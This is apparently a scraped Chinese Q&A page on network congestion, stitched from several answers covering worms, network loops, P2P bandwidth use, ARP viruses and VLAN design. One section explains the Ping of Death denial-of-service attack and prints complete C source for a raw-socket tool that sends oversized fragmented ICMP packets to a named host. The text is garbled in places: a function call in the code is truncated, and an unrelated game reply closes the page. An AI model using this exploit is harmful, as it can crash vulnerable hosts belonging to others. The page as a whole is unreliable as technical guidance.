一、系統資源不足
您可能載入了太多的運用程序在後台運行,請合理的載入軟體或刪除無用百的程序及文件,將資源空出。一、網路自身問題
二、蠕蟲病毒的影響導致網速變慢
這種病毒導致被感染的用戶只要一上網就不停地往外發郵件,病毒選擇用戶個人電腦中的隨機文檔附加在用戶機子的通訊簿的隨機地址上進行郵件發送。成百上千的度這種垃圾郵件有的排著隊往外發送,有的又成批成批地被退回來堆在伺服器上。造成個別骨幹互聯網出現明顯擁內塞,網速明顯變慢,使區域網近於癱瘓。
三、網路中存在迴路導致網速變慢
在一些比較復雜的網路中,經常有多餘的備用線路,如無意間連上時會構成迴路。比如網線從網路中心接到容計算機一室,再從計算機一室接到計算機二室。同時從網路中心又有一條備用線路直接連到計算機二室,若這幾條線同時接通,則構成迴路,數據包會不斷發送和校驗數據,從而影響整體網速。
㈡ 如何網路堵塞
Ping of Death
在網際網路上,ping of death是一種拒絕服務攻擊,方法是由攻擊者故意發送大於65536比特的ip數據包給對方。 TCP/IP的特徵之一是碎裂;它允許單一IP包被分為幾個更小的數據包。在1996年,攻擊者開始利用那一個功能,當他們發現一個進入使用碎片包可以將整個IP包的大小增加到ip協議允許的65536比特以上的時候。當許多操作系統收到一個特大號的ip包時候,它們不知道該做什麼,因此,伺服器會被凍結、當機或重新啟動。
ICMP的回送請求和應答報文通常是用來檢查網路連通性,對於大多數系統而言,發送ICMP echo request 報文的命令是ping ,由於ip數據包的最大長度為65535位元組。而ICMP報頭位於數據報頭之後,並與ip數據包封裝在一起,因此ICMP數據包最大尺寸不超過65515位元組利用這一規定,可以向主機發動 ping of death 攻擊。ping of death 攻擊 是通過在最後分段中,改變其正確的偏移量和段長度的組合,使系統在接收到全部分段並重組報文時總的長度超過了65535位元組,導致內存溢出,這時主機就會出現內存分配錯誤而導致TCP/IP堆棧崩潰,導致死機!
ping_of_death簡述summarization:
通過分片傳輸大於64k的包,導致系統崩潰
vulnerable system:
old windows version or old linux version
in rfc 791 desctibed the maximum ip packet size is 65535, if a system has't check fragment size, when reassemble fragments may cause buffer overflow!
bottom is the sketch map for ping_of_deatch.
below is the ping_of_death source .
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
/*
* If your kernel doesn't muck with raw packets, #define REALLY_RAW.
* This is probably only Linux.
*/
#ifdef REALLY_RAW
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
int
main(int argc, char **argv)
{
int s;
char buf[1500];
struct ip *ip = (struct ip *)buf;
struct icmp *icmp = (struct icmp *)(ip + 1);
struct hostent *hp;
struct sockaddr_in dst;
int offset;
int on = 1;
bzero(buf, sizeof buf);
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
perror("socket");
exit(1);
}
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
perror("IP_HDRINCL");
exit(1);
}
if (argc != 2) {
fprintf(stderr, "usage: %s hostname\n", argv[0]);
exit(1);
}
if ((hp = gethostbyname(argv[1])) == NULL) {
if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
fprintf(stderr, "%s: unknown host\n", argv[1]);
}
} else {
b(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
}
printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
ip->ip_v = 4;
ip->ip_hl = sizeof *ip >> 2;
ip->ip_tos = 0;
ip->ip_len = FIX(sizeof buf);
ip->ip_id = htons(4321);
ip->ip_off = FIX(0);
ip->ip_ttl = 255;
ip->ip_p = 1;
ip->ip_sum = 0; /* kernel fills in */
ip->ip_src.s_addr = 0; /* kernel fills in */
dst.sin_addr = ip->ip_dst;
dst.sin_family = AF_INET;
icmp->icmp_type = ICMP_ECHO;
icmp->icmp_code = 0;
icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
/* the checksum of all 0's is easy to compute */
for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
ip->ip_off = FIX(offset >> 3);
if (offset < 65120)
ip->ip_off |= FIX(IP_MF);
else
ip->ip_len = FIX(418); /* make total 65538 */
if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
sizeof dst) < 0) {
fprintf(stderr, "offset %d: ", offset);
perror("sendto");
}
if (offset == 0) {
icmp->icmp_type = 0;
icmp->icmp_code = 0;
icmp->icmp_cksum = 0;
}
}
}
㈢ 怎樣判斷網路堵塞
http://www.265.com/tools/computer/speed.htm
去這個地方測試一下你的網速!
到這里下載網路環境測試軟體http://www.xtzj.com/read-htm-tid-191806.html 網路堵塞 網路速度 一眼明了
㈤ 網路堵塞怎麼解決
不用拿去修,最笨的方法。重做一次系統吧
㈥ 網路堵塞怎麼辦
裝了電驢之內的BT下載軟體了把,卸掉使使
㈦ 網路堵塞在怎麼看
帶寬過小或流量過大。具體情況,具體分析。
也有網路風暴,感覺跟堵塞一樣。
㈧ 在Linux系統下有沒有工具可以檢測網路是否有堵塞
ntop或bandwitch得到埠的流量。而進程間的網路通訊是依靠埠的,這樣也就得到了進程的流量。但是對於動態埠的進程這個是有難度的。
㈨ 網路阻塞怎麼辦
1. 運行商線路問題
網速變慢有時候並不是網路本身的問題,而是運行商線路問題。如果網路內部找不到問題時,建議電話詢問一下寬頻運行商。
2. 網線接觸不良或者交換機硬體原因
網線接觸不良或者交換機的硬體原因通常也可能導致網速變慢。這個問題可以通過「Ping」網關來判斷,如果ping網關的延時較高,那基本可以肯定是硬體原因或者接觸不良。
3. P2P類軟體佔用過多帶寬
迅雷、BT等P2P軟體以及在線視頻都會佔用大量的帶寬,因此,我們在檢測網速變慢的原因的時候要確定,區域網內是否有人使用P2P軟體下載,是否有人在線視頻。
判斷此類問題最好用流量監測工具,如wireshark、wfilter(超級嗅探狗)。
4. ARP病毒以及蠕蟲病毒
採用ARP欺騙的木馬病毒發作的時候會發出大量的數據包導致區域網通訊擁塞,用戶會感覺上網速度越來越慢,使區域網近於癱瘓。因此,我們必須及時升級所用殺毒軟體;計算機也要及時升級、安裝系統漏洞補丁程序,同時卸載不必要的服務、關閉不必要的埠;安裝ARP防火牆,以提高系統的安全性和可靠性。同時有些蠕蟲病毒也會導致網路速度變慢。
5.不合理的網路劃分導致廣播風暴
為了提高通信效率,有效地避免區域網一些重要部分被攻擊,保護敏感數據,我們可以劃分大量VLAN。由於VLAN之間的通訊必須藉助於第三層設備,在VLAN之間根本無法進行廣播,所以,廣播風暴就會被限制在一個VALN內。由此可見,在區域網絡中,適當地劃分VLAN,不僅有利於提高網路的通訊效率和網路安全,而且還可以有效地提高網路的穩定性,使一台或幾台設備的損壞,不致影響到整個網路的正常通信。
㈩ 網路堵塞
喜歡什麼樣的?夢幻國度可以.